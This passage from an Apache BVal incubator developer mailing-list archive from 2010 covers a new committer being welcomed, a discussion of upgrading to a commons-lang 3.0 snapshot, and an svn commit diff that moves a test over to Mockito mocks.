b=Ffi2uwwbohggTr4n2rQKaGE8VuMCVp7E5sBWELnjaZf8Tfwpld/e2uxXtLXgC3Xaq2 tKakUOhK8oUkWk+k69ZJSG9WgI5dfzjqmURVaal3FvqrTcibhVQ6qd1zcqWjao/1Vtp6 3SrL+cgn4cULDTH1OMhdBkTMaJbyVmlWt9eWc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :content-type; b=aqcend3NaAPC++L1FQ6FqwCzwj0mjmhDag2AvO/aTi44BVlkNUEhQu4phxy4Y+sbhI 5n2Mw+/pCo2VCPPq54GGckrQxihh5i8SLMTwOhErZMNgXNWrYwtPFms6tg4dVRJi9N2Q 5ML+xOihGh8UJuyOBr4vcbkYaTIMdZcnwB5js= Received: by 161.129.204.104 with SMTP id u6mr12058173ibc.121.1280328978316; Wed, 28 Jul 2010 07:56:18 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Wed, 28 Jul 2010 07:55:58 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: Gerhard Petracek <[email protected]> Date: Wed, 28 Jul 2010 16:55:58 +0200 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Matt Benson as a new Committer To: [email protected] Content-Type: multipart/alternative; boundary=000325579d92f2bfd6048c73d192 X-Virus-Checked: Checked by ClamAV on apache.org --000325579d92f2bfd6048c73d192 Content-Type: text/plain; charset=ISO-8859-1 welcome! regards, gerhard http://www.irian.at Your JSF powerhouse - JSF Consulting, Development and Courses in English and German Professional Support for Apache MyFaces 2010/7/28 Jeremy Bauer <[email protected]> > Congratulations, Matt! Welcome aboard. > > -Jeremy > > On Tue, Jul 27, 2010 at 7:01 PM, Mohammad Nour El-Din < > [email protected]> wrote: > > > welcome aboard Matt :) > > > > On Wed, Jul 28, 2010 at 12:24 AM, Carlos Vara <[email protected]> > wrote: > > > Welcome officially aboard Matt! > > > > > > > > > On Tue, Jul 27, 2010 at 8:55 PM, Donald Woods <[email protected]> > wrote: > > > > > >> No problem. I've been swamped with work, but wanted to announce it > for > > >> those that don't watch the commits. > > >> > > >> -Donald > > >> > > >> > > >> On 7/27/10 3:38 PM, Matt Benson wrote: > > >> > On Jul 27, 2010, at 2:37 PM, Donald Woods wrote: > > >> > > > >> >> The BVAL PPMC recently extended committer karma to Matt and he has > > >> >> accepted. Welcome aboard Matt! > > >> >> > > >> > > > >> > Oops, kind of anticlimactic since I already started committing > stuff. > > >> Officially, thanks all! ;) > > >> > > > >> > -Matt > > >> > > > >> >> -Donald > > >> >> > > >> > > > >> > > > >> > > > > > > > > > > > -- > > Thanks > > - Mohammad Nour > > Author of (WebSphere Application Server Community Edition 2.0 User > Guide) > > http://www.redbooks.ibm.com/abstracts/sg247585.html > > - LinkedIn: http://www.linkedin.com/in/mnour > > - Blog: http://tadabborat.blogspot.com > > ---- > > "Life is like riding a bicycle. To keep your balance you must keep > moving" > > - Albert Einstein > > > > "Writing clean code is what you must do in order to call yourself a > > professional. There is no reasonable excuse for doing anything less > > than your best." > > - Clean Code: A Handbook of Agile Software Craftsmanship > > > > "Stay hungry, stay foolish." > > - Steve Jobs > > > --000325579d92f2bfd6048c73d192-- From [email protected] Wed Jul 28 19:49:50 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67141 invoked from network); 28 Jul 2010 19:49:50 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Jul 2010 19:49:50 -0000 Received: (qmail 70468 invoked by uid 500); 28 Jul 2010 19:49:50 -0000 Delivered-To: [email protected] Received: (qmail 70427 invoked by uid 500); 28 Jul 2010 19:49:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70419 invoked by uid 99); 28 Jul 2010 19:49:49 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 19:49:49 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-yx0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 19:49:41 +0000 Received: by yxi11 with SMTP id 11so1148659yxi.6 for <[email protected]>; Wed, 28 Jul 2010 12:49:20 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:from:content-type :content-transfer-encoding:subject:date:message-id:to:mime-version :x-mailer; bh=PkCEl3dmTMpsQtEdVO/L7sFzBVNBUgKsudBzENVGb3I=; b=A5+O3wGLUhotJLum9qYK0rcGuoaIT4rZaX1gxqrfqPW9jquCaUOW4p5qVzURvosiUk vcWN+/fEDwwDJEP+G16iPj+3wC3+aIs1OFlZWAHetw3YY0pYigA6ZZomJc2GyLWWTg/T DK63KRiar2e3qnt56ylQ6lOTYuBqAVFZxn/L0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=from:content-type:content-transfer-encoding:subject:date:message-id :to:mime-version:x-mailer; b=wTtFi0Gpjd1XmNZH2pMJgPTBxvf95PrFa7bvAR/iOsbG19xEnWngiT13+Gp10X6rwy qX1MuoSc/V0R4GJWv0w+h/D/6HAoFC5GQEm3U7vE/7AraYglHYEpyVNwPANhd3y3UmOo ggLm75qDGuxs5NZCTyszNuRiO1JlYhCjozqHI= Received: by 161.129.204.104 with SMTP id s7mr11454923ybj.405.1280346560142; Wed, 28 Jul 2010 12:49:20 -0700 (PDT) Received: from [161.129.204.104] (adsl-068-213-090-227.sip.bhm.bellsouth.net [161.129.204.104]) by mx.google.com with ESMTPS id q21sm6515044ybk.3.2161.129.204.104.49.17 (version=TLSv1/SSLv3 cipher=RC4-MD5); Wed, 28 Jul 2010 12:49:18 -0700 (PDT) From: Matt Benson <[email protected]> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Subject: Upgrading commons-lang Date: Wed, 28 Jul 2010 14:49:09 -0500 Message-Id: <[email protected]> To: [email protected] Mime-Version: 1.0 (Apple Message framework v1081) X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org Commons-Lang 3.0-SNAPSHOT was published yesterday. Its APIs have been = updated for generics and varargs, and because its Maven artifactId and = java package names have been changed, the upgrade path is a painless = one. Additionally, and most importantly to me at present, lang3 has a = TypeUtils class that can replace and augment bval-jsr303's existing = TypeUtils class. I would say that in all likelihood lang 3.0 will be = released before bval 1.0. I would think the upgrade would be more a = question of 'when' rather than 'if'... how would you all feel about = allowing snapshot dependencies for 0.x-incubating releases after = 0.2-incubating? Matt= From [email protected] Wed Jul 28 21:35:31 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48995 invoked from network); 28 Jul 2010 21:35:31 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Jul 2010 21:35:31 -0000 Received: (qmail 83897 invoked by uid 500); 28 Jul 2010 21:35:31 -0000 Delivered-To: [email protected] Received: (qmail 83847 invoked by uid 500); 28 Jul 2010 21:35:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83838 invoked by uid 99); 28 Jul 2010 21:35:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 21:35:30 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp108.prem.mail.sp1.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 28 Jul 2010 21:35:23 +0000 Received: (qmail 37251 invoked from network); 28 Jul 2010 21:35:03 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=DKIM-Signature:Received:X-Yahoo-SMTP:X-YMail-OSG:X-Yahoo-Newman-Property:Content-Type:Mime-Version:Subject:From:In-Reply-To:Date:Content-Transfer-Encoding:Message-Id:References:To:X-Mailer; b=bI+6YVLP0FBTqvqwJVBupTGQeBUg9pTg3qy4Wt708V2enNJDL/tbuDKklBtuEQYgWMEFSjqVdWiFeEwVvfgXIn4ZKZs4+YHbj/47+VJJVspWSUpULB7sgyurwyTnRD3qNvlhDcPb6GS5NgZcukbb9kUrrZllo/T/prCSGuwVn8A= ; DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1280352903; bh=X7kV0uQsPpYNSvRRjhre+yTnJr2pPwYKpaJmRzhlojI=; h=Received:X-Yahoo-SMTP:X-YMail-OSG:X-Yahoo-Newman-Property:Content-Type:Mime-Version:Subject:From:In-Reply-To:Date:Content-Transfer-Encoding:Message-Id:References:To:X-Mailer; b=vbQcivaZc2iGyZ9HNMDyqYKeduOrUhDI61vN6F6KMr8Lm/5iC9ztzAowMQf0yqitkopaR5zXRt7+z9LcAPnzWsSviBWTqNbXszGpT4u7I3dY8wvOZpYvsMcNNz6jcVw+zpg8g+M8LTkj2CCYPXbHcB9DNXuJCuKkdArxYWedCBY= Received: from [161.129.204.104] ([email protected] with plain) by smtp108.prem.mail.sp1.yahoo.com with SMTP; 28 Jul 2010 14:35:03 -0700 PDT X-Yahoo-SMTP: .9oIUzyswBANsYgUm_5uPui0skTnzGJXJQ-- X-YMail-OSG: 6ltquN0VM1liw_L86fd2b4rnK8TwcAnsIY_A8piNlzUOlMU GN2uISuTSZzX9l6WvniqVrKBqp.QQo.aMGMu6adoYGj6ibCRzvp8XUaSLX44 waLOXd22ZGUmD1fiHfa_W0FoAC7r74NTXZxJOQhgaR1zKLuycapJCQ7WjL6t rjuSYD5ZoJA1dkGFTty5TojSNJeT5UpAzt1YhpY1xQLpgJ9Z2Et1tTQn6fU7 8rQMYbSgiv9YaIUP0ZFh1iFesfq6xxSJF2hYHUEYX953DCd1JXUvIcpIH9lM mWxxvB1jGl8Or.gCYirarcys- X-Yahoo-Newman-Property: ymail-3 Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: Upgrading commons-lang From: David Jencks <[email protected]> In-Reply-To: <[email protected]> Date: Wed, 28 Jul 2010 14:35:01 -0700 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) I have no problems with using snapshots during development but IMO we = can't release with snapshot dependencies. Do you have any concrete info = on when the commons-lang release might be? thanks david jencks On Jul 28, 2010, at 12:49 PM, Matt Benson wrote: > Commons-Lang 3.0-SNAPSHOT was published yesterday. Its APIs have been = updated for generics and varargs, and because its Maven artifactId and = java package names have been changed, the upgrade path is a painless = one. Additionally, and most importantly to me at present, lang3 has a = TypeUtils class that can replace and augment bval-jsr303's existing = TypeUtils class. I would say that in all likelihood lang 3.0 will be = released before bval 1.0. I would think the upgrade would be more a = question of 'when' rather than 'if'... how would you all feel about = allowing snapshot dependencies for 0.x-incubating releases after = 0.2-incubating? >=20 > Matt From [email protected] Wed Jul 28 21:54:52 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58238 invoked from network); 28 Jul 2010 21:54:51 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Jul 2010 21:54:51 -0000 Received: (qmail 13712 invoked by uid 500); 28 Jul 2010 21:54:51 -0000 Delivered-To: [email protected] Received: (qmail 13665 invoked by uid 500); 28 Jul 2010 21:54:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13657 invoked by uid 99); 28 Jul 2010 21:54:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 21:54:51 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gx0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Jul 2010 21:54:42 +0000 Received: by gxk2 with SMTP id 2so2130423gxk.6 for <[email protected]>; Wed, 28 Jul 2010 14:54:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=u5aT+Jdl66ovzqtBNbZ6dqCiasWf13Ic3+g7uIuGt5o=; b=wa3vn8wvsxPyHBlbQ2ww31dJBz9J+Do0AX4EkjZvRkJZ215vd1cerH/u8Xdsaoqytr rC9pXWNGnXTi2xQdhaJdJvHiUgqRe3gzKUFzI+3H2XuolBy7N8naXPVE3oQPt4KyMObF 1Sj8eIC5MgNzZ8i1lLd7nFusz4sQPoaKV10Xs= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=H5U/dADfvkUC3xh1AMbtLCpprZBT/7QaCFIX421rPT5bbHSRrqMJcm9B7sOErfCjGO /Q63qCXrNGGoPfhd5TBEHZrpbMYX/i6ll6zNd+cSsYgOizPSKE3GqjBa8JOkrS0Tfgec cnsE5iCMVnUO+gdlPdSEd0LcCARHYJgyA7GU0= Received: by 161.129.204.104 with SMTP id l2mr13577862ybn.195.1280354061409; Wed, 28 Jul 2010 14:54:21 -0700 (PDT) Received: from [161.129.204.104] (adsl-068-213-090-227.sip.bhm.bellsouth.net [161.129.204.104]) by mx.google.com with ESMTPS id q3sm114514ybe.2.2161.129.204.104.54.19 (version=TLSv1/SSLv3 cipher=RC4-MD5); Wed, 28 Jul 2010 14:54:20 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: Upgrading commons-lang From: Matt Benson <[email protected]> In-Reply-To: <[email protected]> Date: Wed, 28 Jul 2010 16:54:15 -0500 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org On Jul 28, 2010, at 4:35 PM, David Jencks wrote: > I have no problems with using snapshots during development but IMO we = can't release with snapshot dependencies. Do you have any concrete info = on when the commons-lang release might be? >=20 Nothing concrete, no. If we decide that snapshot dependencies aren't = acceptable even while bval is incubating/pre-1.0, then I'll just start = the upgrade whenever lang3 is released, and borrow code when necessary. = I'm in the process of porting whatever looks broadly helpful from bval's = TypeUtils to lang's as well. -Matt > thanks > david jencks >=20 > On Jul 28, 2010, at 12:49 PM, Matt Benson wrote: >=20 >> Commons-Lang 3.0-SNAPSHOT was published yesterday. Its APIs have = been updated for generics and varargs, and because its Maven artifactId = and java package names have been changed, the upgrade path is a painless = one. Additionally, and most importantly to me at present, lang3 has a = TypeUtils class that can replace and augment bval-jsr303's existing = TypeUtils class. I would say that in all likelihood lang 3.0 will be = released before bval 1.0. I would think the upgrade would be more a = question of 'when' rather than 'if'... how would you all feel about = allowing snapshot dependencies for 0.x-incubating releases after = 0.2-incubating? >>=20 >> Matt >=20 From [email protected] Thu Jul 29 11:15:20 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91596 invoked from network); 29 Jul 2010 11:15:20 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 29 Jul 2010 11:15:20 -0000 Received: (qmail 99976 invoked by uid 500); 29 Jul 2010 11:15:20 -0000 Delivered-To: [email protected] Received: (qmail 99921 invoked by uid 500); 29 Jul 2010 11:15:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99907 invoked by uid 99); 29 Jul 2010 11:15:18 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Jul 2010 11:15:18 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27802.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 29 Jul 2010 11:15:12 +0000 Received: (qmail 66425 invoked by uid 60001); 29 Jul 2010 11:14:50 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1280402090; bh=+fXZ2bvGYByKxzww+RIYZT1iIKp1O9zQ26vL51jEtqs=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:Cc:In-Reply-To:MIME-Version:Content-Type; b=zqLuAURjJ1fmLgJx3M9Rp6UTiKHd2YQ6yJ6ipUhrBrtpivQhh3s0LrA/5WmzSkFQQEhXF3KEJjeH3hK+2oldeemaNFzd3LtAfsgtsOfEAF7D/e/SGBGaVkd+sD5iIRuVPvRwKYgntuPnHyLHDs36Eeq2agpDluiuC1/+btNrfMI= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:Cc:In-Reply-To:MIME-Version:Content-Type; b=v4MOQ0AdFETR1dRSuFugZOYn3Wit9E5Xf5aC9FWj65+NgpfKxyw7dYdR8gV09e4jv4TQZiQgLTzwf/7LE14+l5xKdFk4hgwizDnrj957GAJ4rqMSGbRq5Ci5f7i4aQ8c9wsNx3GZgywmOO6cSyd5QwZbZ7SJHgwl/2fk7OV5hPE=; Message-ID: <[email protected]> X-YMail-OSG: yzbQIWcVM1lkdTOyjtkILTkh72YcYbFSqiYHVvSWnBs8eNh y3x0HQ.JIXqRlO2pACp.l8MY3rixR65PaJeYjURpIYUrxgmSQqULJ11kJp._ ZxCW0.HQXosG8WgJMYmeMQ3V0Y4eeV3TOUMaiAk0JViyEGSfo3oIgkbk6aeN CcmbMZSd9Ckgn3Vl2ht.JCn_WOgQ2xvv_IApO.Fgwc9Zlp2udzH89_kAgPgi LkV3M3Ck0tOaqcwE3CUqZkKY.PWqFUkEsD9EYGiywoXRIIs9jE57d2jdY6bi uvQ0xOc8hjC8kf94ITbU- Received: from [161.129.204.104] by web27802.mail.ukl.yahoo.com via HTTP; Thu, 29 Jul 2010 11:14:50 GMT X-Mailer: YahooMailRC/420.4 YahooMailWebService/161.129.204.1047674 References: <[email protected]> <[email protected]> Date: Thu, 29 Jul 2010 11:14:50 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: Upgrading commons-lang To: [email protected] Cc: Commons Developers List <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii maybe we can ask Henri and Sebb to push a commons-lang-3.0-pre-1 release? LieGrue, strub ----- Original Message ---- > From: David Jencks <[email protected]> > To: [email protected] > Sent: Wed, July 28, 2010 11:35:01 PM > Subject: Re: Upgrading commons-lang > > I have no problems with using snapshots during development but IMO we can't >release with snapshot dependencies. Do you have any concrete info on when the >commons-lang release might be? > > thanks > david jencks > > On Jul 28, 2010, at 12:49 PM, Matt Benson wrote: > > > Commons-Lang 3.0-SNAPSHOT was published yesterday. Its APIs have been >updated for generics and varargs, and because its Maven artifactId and java >package names have been changed, the upgrade path is a painless one. >Additionally, and most importantly to me at present, lang3 has a TypeUtils >class that can replace and augment bval-jsr303's existing TypeUtils class. I >would say that in all likelihood lang 3.0 will be released before bval 1.0. I >would think the upgrade would be more a question of 'when' rather than 'if'... >how would you all feel about allowing snapshot dependencies for 0.x-incubating >releases after 0.2-incubating? > > > > Matt > > From [email protected] Fri Jul 30 09:13:27 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91192 invoked from network); 30 Jul 2010 09:13:27 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 30 Jul 2010 09:13:27 -0000 Received: (qmail 7048 invoked by uid 500); 30 Jul 2010 09:13:27 -0000 Delivered-To: [email protected] Received: (qmail 7008 invoked by uid 500); 30 Jul 2010 09:13:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6999 invoked by uid 99); 30 Jul 2010 09:13:25 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Jul 2010 09:13:25 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-vw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 30 Jul 2010 09:13:18 +0000 Received: by vws13 with SMTP id 13so1201779vws.6 for <[email protected]>; Fri, 30 Jul 2010 02:12:57 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=5sfIWD+KVxb0u7NteLCeYxIqW8U7gDVVK8R5ZAzUkTE=; b=eG3tXcj50xQSF4KyzFNFnnK0U/bZ+QPygpTKMns1/ZBbCrqGLdcJZR/yRB8g9d7rva t2TjAsZOdWaffaxQPbxtNzaCh7IRBe37+Nn7uwCD9qNYpcJfyd8vxea2srku6EsGFD5A 90TYjGyXA4lk726sVGND/HY6Dvm+nkUimaGEI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=eaa4+lKXovd0L0A/VnsP+7OmwyqUGtK71k2QGuElVZMcwfCDSP0qrf13TMKxq6ryId NmgLJudEa12YeDUBY0NRnHk78rHnta5Goq1mKuNexBTYQA+bPySXmqOEMvhdrIB8dK22 eykWsjS4DBb4qlDkpR3jLZGtWTxKWXvwxcmWk= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id k31mr977584vcr.13.1280481177377; Fri, 30 Jul 2010 02:12:57 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 30 Jul 2010 02:12:57 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Fri, 30 Jul 2010 10:12:57 +0100 Message-ID: <[email protected]> Subject: Re: svn commit: r980571 - in /incubator/bval/trunk: bval-jsr303/pom.xml bval-jsr303/src/test/java/org/apache/bval/jsr303/ConstraintValidatorContextTest.java pom.xml From: Carlos Vara <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e68ee005b81d32048c97416a --0016e68ee005b81d32048c97416a Content-Type: text/plain; charset=ISO-8859-1 Nice, I'm a big fan of mockito, so now we can start using it more in our tests :-) On Thu, Jul 29, 2010 at 10:04 PM, <[email protected]> wrote: > Author: mbenson > Date: Thu Jul 29 21:04:50 2010 > New Revision: 980571 > > URL: http://svn.apache.org/viewvc?rev=980571&view=rev > Log: > use a mock object in test > > Modified: > incubator/bval/trunk/bval-jsr303/pom.xml > > incubator/bval/trunk/bval-jsr303/src/test/java/org/apache/bval/jsr303/ConstraintValidatorContextTest.java > incubator/bval/trunk/pom.xml > > Modified: incubator/bval/trunk/bval-jsr303/pom.xml > URL: > http://svn.apache.org/viewvc/incubator/bval/trunk/bval-jsr303/pom.xml?rev=980571&r1=980570&r2=980571&view=diff > > ============================================================================== > --- incubator/bval/trunk/bval-jsr303/pom.xml (original) > +++ incubator/bval/trunk/bval-jsr303/pom.xml Thu Jul 29 21:04:50 2010 > @@ -112,6 +112,11 @@ > <scope>test</scope> > </dependency> > <dependency> > + <groupId>org.mockito</groupId> > + <artifactId>mockito-core</artifactId> > + <scope>test</scope> > + </dependency> > + <dependency> > <groupId>log4j</groupId> > <artifactId>log4j</artifactId> > <scope>test</scope> > > Modified: > incubator/bval/trunk/bval-jsr303/src/test/java/org/apache/bval/jsr303/ConstraintValidatorContextTest.java > URL: > http://svn.apache.org/viewvc/incubator/bval/trunk/bval-jsr303/src/test/java/org/apache/bval/jsr303/ConstraintValidatorContextTest.java?rev=980571&r1=980570&r2=980571&view=diff > > ============================================================================== > --- > incubator/bval/trunk/bval-jsr303/src/test/java/org/apache/bval/jsr303/ConstraintValidatorContextTest.java > (original) > +++ > incubator/bval/trunk/bval-jsr303/src/test/java/org/apache/bval/jsr303/ConstraintValidatorContextTest.java > Thu Jul 29 21:04:50 2010 > @@ -20,21 +20,17 @@ package org.apache.bval.jsr303; > > import junit.framework.Assert; > import junit.framework.TestCase; > -import org.apache.bval.jsr303.groups.Group; > -import org.apache.bval.jsr303.groups.Groups; > import org.apache.bval.jsr303.util.PathImpl; > -import org.apache.bval.model.MetaBean; > -import org.apache.bval.model.MetaProperty; > import org.apache.bval.model.ValidationListener; > import org.apache.bval.model.ValidationListener.Error; > -import org.apache.bval.util.AccessStrategy; > +import org.mockito.Mock; > +import org.mockito.Mockito; > +import org.mockito.MockitoAnnotations; > +import org.mockito.invocation.InvocationOnMock; > +import org.mockito.stubbing.Answer; > > -import javax.validation.ConstraintValidator; > import javax.validation.ConstraintValidatorContext; > import > javax.validation.ConstraintValidatorContext.ConstraintViolationBuilder; > -import javax.validation.MessageInterpolator; > -import javax.validation.TraversableResolver; > - > > /** > * Checks to validate the correct implementation of > @@ -47,190 +43,71 @@ public class ConstraintValidatorContextT > private ConstraintValidatorContextImpl cvc; > private ConstraintViolationBuilder cvb; > > - private void resetConstraintValidatorContext() { > - this.cvc = new ConstraintValidatorContextImpl( > - new DummyContext<ValidationListener>(), null); > + @Mock > + private GroupValidationContext<ValidationListener> > groupValidationContext; > + > + /** > + * {@inheritDoc} > + */ > + @Override > + public void setUp() throws Exception { > + super.setUp(); > + MockitoAnnotations.initMocks(this); > + > Mockito.when(groupValidationContext.getPropertyPath()).thenAnswer(new > Answer<PathImpl>() { > + > + public PathImpl answer(InvocationOnMock invocation) throws > Throwable { > + return PathImpl.createPathFromString(""); > + } > + }); > + this.cvc = new > ConstraintValidatorContextImpl(groupValidationContext, > + null); > this.cvc.disableDefaultConstraintViolation(); > this.cvb = > cvc.buildConstraintViolationWithTemplate("dummy.msg.tpl"); > } > > - // Test that builds a path and checks it against the expected one > - public void testPathBuilding() { > - > - resetConstraintValidatorContext(); > - > - // persons[1] > + public void testPerson1() { > cvb.addNode("person").addNode(null).inIterable().atIndex(1) > .addConstraintViolation(); > Error error = cvc.getErrorMessages().iterator().next(); > PathImpl errorPath = (PathImpl) error.getOwner(); > - Assert.assertEquals("Incorrect path created", "person[1]", > errorPath.toString()); > - > - resetConstraintValidatorContext(); > + Assert.assertEquals("Incorrect path created", "person[1]", > errorPath > + .toString()); > + } > > - // persons[lawyer].name > + public void testPersonLawyerName() { > cvb.addNode("person").addNode("name").inIterable().atKey("john") > .addConstraintViolation(); > - error = cvc.getErrorMessages().iterator().next(); > - errorPath = (PathImpl) error.getOwner(); > - Assert.assertEquals("Incorrect path created", "person[john].name", > errorPath.toString()); > - > - resetConstraintValidatorContext(); > + Error error = cvc.getErrorMessages().iterator().next(); > + PathImpl errorPath = (PathImpl) error.getOwner(); > + Assert.assertEquals("Incorrect path created", "person[john].name", > + errorPath.toString()); > + } > > - // [0].name[] > + public void test0Name() { > > cvb.addNode(null).addNode("name").inIterable().atIndex(0).addNode(null) > .inIterable().addConstraintViolation(); > - error = cvc.getErrorMessages().iterator().next(); > - errorPath = (PathImpl) error.getOwner(); > - Assert.assertEquals("Incorrect path created", "[0].name[]", > errorPath.toString()); > - > - resetConstraintValidatorContext(); > + Error error = cvc.getErrorMessages().iterator().next(); > + PathImpl 